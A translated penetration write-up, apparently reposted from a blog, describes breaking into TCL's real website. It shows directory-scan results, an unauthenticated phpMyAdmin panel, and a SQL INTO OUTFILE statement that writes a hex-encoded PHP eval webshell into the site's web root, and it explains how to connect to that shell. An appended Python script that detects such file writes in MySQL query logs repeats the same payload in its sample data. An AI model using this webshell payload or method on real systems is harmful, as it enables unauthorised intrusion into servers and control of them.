TCL Penetration Process

Source: Internet
Author: User

Daniel laughed. In fact, this is luck.

Target website www.tcl.com

Website Structure

Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0

The scan result is as follows:

http://www.tcl.com:80/%23sql.asp HTTP/1.1 200 OK
http://www.tcl.com:80/%23sql.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/%23sql.php HTTP/1.1 200 OK
http://www.tcl.com:80/a HTTP/1.1 200 OK
http://www.tcl.com:80/cgi-bin/ HTTP/1.1 403 Forbidden
http://www.tcl.com:80/index.php HTTP/1.1 200 OK
http://www.tcl.com:80/main/ HTTP/1.1 403 Forbidden
http://www.tcl.com:80/News HTTP/1.1 200 OK
http://www.tcl.com:80/news/ HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/default.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/default.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/default.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin_login.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin_login.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin_login.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/login.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/login.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/login.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/manage/login.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/manage/login.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/manage/login.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/ HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/test.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/test.aspx HTTP/1.1 200 OK
http://www.tcl.com:80/news/newadmin/test.php HTTP/1.1 200 OK
http://www.tcl.com:80/newslogin.htm. HTTP/1.1 200 OK
http://www.tcl.com:80/phpinfo.php HTTP/1.1 200 OK
http://www.tcl.com:80/upload.php HTTP/1.1 200 OK
http://www.tcl.com:80/upload.php?Action=upfile HTTP/1.1 200 OK
http://www.tcl.com:80/phpinfo.php HTTP/1.1 200 OK
http://www.tcl.com:80/news/wenzhang.mdb HTTP/1.1 200 OK
http://www.tcl.com:80/news/admin/upfile.asp HTTP/1.1 200 OK
http://www.tcl.com:80/news/ HTTP/1.1 200 OK
http://www.tcl.com:80/phpmyadmin/ HTTP/1.1 200 OK

There are many more results that I will not post here.

Access http://www.tcl.com:80/newslogin.htm.

The error message directly exposes the absolute path:

Fatal error: Cannot instantiate abstract class Action in /opt/lampp/htdocs/tcl/Front/Runtime/~Runtime.php on line 2

Now let's take a look at http://www.tcl.com:80/phpmyadmin/ and try to access it.

This dumb vulnerability exists: the phpMyAdmin back end can be entered without any account or password. I really don't understand how the staff who protect the TCL website could leave this vulnerability in place.
Now that we are logged in to the phpMyAdmin back end, remember that we already obtained the absolute path earlier.

Write a one-line webshell using SQL.

Click SQL and run:

select 0x3C3F706870206576616C28245F504F53545B636D645D293F3E into outfile '/opt/lampp/htdocs/tcl/2b.php';

Access www.tcl.com/2b.php and use the client to connect to www.tcl.com/2b.php.

A blank page indicates that the file was written successfully; then connect to it with the client.

The next step is to upload a webshell, which I will not go into here.
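
A detection sketch for the file-write step above, as an added example that is not part of the original post: it scans MySQL general-query-log style lines for INTO OUTFILE/DUMPFILE statements, decodes hex literals, and flags script markup being written into a web root. The log lines, the web-root list and the extension list are constructed assumptions.

```python
import re

# Assumptions for this example: web roots and script extensions to watch.
WEB_ROOTS = ("/opt/lampp/htdocs/", "/var/www/")
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s*['\"]([^'\"]+)['\"]", re.I)
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
SCRIPT_TAG_RE = re.compile(rb"<\?|<%")

def inspect_query(sql):
    """Return the reasons a statement looks like a script dropped via SQL."""
    m = OUTFILE_RE.search(sql)
    if not m:
        return []
    path = m.group(1)
    reasons = ["writes a file: " + path]
    if path.startswith(WEB_ROOTS):
        reasons.append("target is inside a web root")
    if path.lower().endswith(SCRIPT_EXT):
        reasons.append("target has a script extension")
    # Hex literals hide the payload from keyword filters, so decode them first.
    blobs = [bytes.fromhex(h) for h in HEX_RE.findall(sql)]
    blobs.append(sql.encode("utf-8", "replace"))
    if any(SCRIPT_TAG_RE.search(b) for b in blobs):
        reasons.append("payload contains server-side script markup")
    return reasons

def scan_log(lines):
    """Return (timestamp, thread_id, severity, reasons) for each file write."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = inspect_query(m.group(3))
        if reasons:
            severity = "high" if len(reasons) > 1 else "info"
            findings.append((m.group(1), int(m.group(2)), severity, reasons))
    return findings

# Constructed sample lines: timestamp, thread id, command, SQL text.
SAMPLE_LOG = [
    "2024-05-01T02:11:07Z\t41 Query\tSELECT id, title FROM news WHERE id = 7",
    "2024-05-01T02:11:09Z\t41 Query\tselect 0x3C3F706870206576616C28245F504F53545B636D645D293F3E"
    " into outfile '/opt/lampp/htdocs/tcl/2b.php'",
    "2024-05-01T02:12:30Z\t52 Query\tSELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
]
```

Detection complements prevention: MySQL's secure_file_priv setting and withholding the FILE privilege from application accounts restrict where INTO OUTFILE can write.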

 
